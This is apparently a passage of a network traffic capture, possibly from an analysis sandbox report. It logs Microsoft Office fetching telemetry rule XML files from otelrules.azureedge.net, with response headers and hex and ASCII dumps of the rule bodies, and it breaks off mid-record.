                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BDC681E17"
                                                                                                                                                                                                                                                                            x-ms-request-id: 5bb85073-401e-005b-22cf-439c0c000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180014Z-174f7845968j6t2phC1EWRcfe800000016a000000000ws8c
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:14 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            125192.168.2.45009513.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:13 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:14 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 1393
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BE3E55B6E"
                                                                                                                                                                                                                                                                            x-ms-request-id: d2df421c-b01e-0021-5593-43cab7000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180014Z-174f7845968psccphC1EWRuz9s00000016h000000000cx8s
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:14 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            126192.168.2.45009713.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:13 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:14 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 1393
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BE39DFC9B"
                                                                                                                                                                                                                                                                            x-ms-request-id: e95efd1e-501e-005b-66fd-44d7f7000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180014Z-174f784596886s2bhC1EWR743w000000168g00000000kyfr
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:14 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            127192.168.2.45010013.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:14 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:14 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 1356
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BDF66E42D"
                                                                                                                                                                                                                                                                            x-ms-request-id: c2b00c79-201e-0000-27b2-42a537000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180014Z-174f7845968j6t2phC1EWRcfe800000016b000000000s687
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:14 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            128192.168.2.45010913.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:16 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:16 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:16 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 1395
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BE017CAD3"
                                                                                                                                                                                                                                                                            x-ms-request-id: c57c8fd9-601e-0032-5e19-45eebb000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180016Z-174f7845968j6t2phC1EWRcfe800000016gg0000000033mp
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:16 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            129192.168.2.45011113.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:16 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:16 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:16 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 1395
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BDE12A98D"
                                                                                                                                                                                                                                                                            x-ms-request-id: e61fb942-301e-000c-78b4-43323f000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180016Z-174f7845968ljs8phC1EWRe6en000000163000000000ghsw
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:16 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            130192.168.2.45011013.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:16 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:16 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:16 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 1358
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BE6431446"
                                                                                                                                                                                                                                                                            x-ms-request-id: 00f8033d-001e-000b-2543-4415a7000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180016Z-174f7845968psccphC1EWRuz9s00000016dg00000000vddq
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:16 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            131192.168.2.45011213.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:16 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:16 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:16 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 1358
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BE022ECC5"
                                                                                                                                                                                                                                                                            x-ms-request-id: 8e63dee6-401e-002a-6d1e-45c62e000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180016Z-174f78459685726chC1EWRsnbg00000016ag00000000d9cb
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:16 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            132192.168.2.45011413.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:16 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:17 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 18:00:17 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                            Content-Length: 1389
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                                            ETag: "0x8DC582BE10A6BC1"
                                                                                                                                                                                                                                                                            x-ms-request-id: ca68633c-201e-006e-1f8a-3fbbe3000000
                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                            x-azure-ref: 20241203T180017Z-174f7845968kvnqxhC1EWRmf3g0000000t1g00000000h0fe
                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            2024-12-03 18:00:17 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            133192.168.2.45012513.107.246.63443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 18:00:18 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                            2024-12-03 18:00:18 UTC494INHTTP/1.1 200 OK
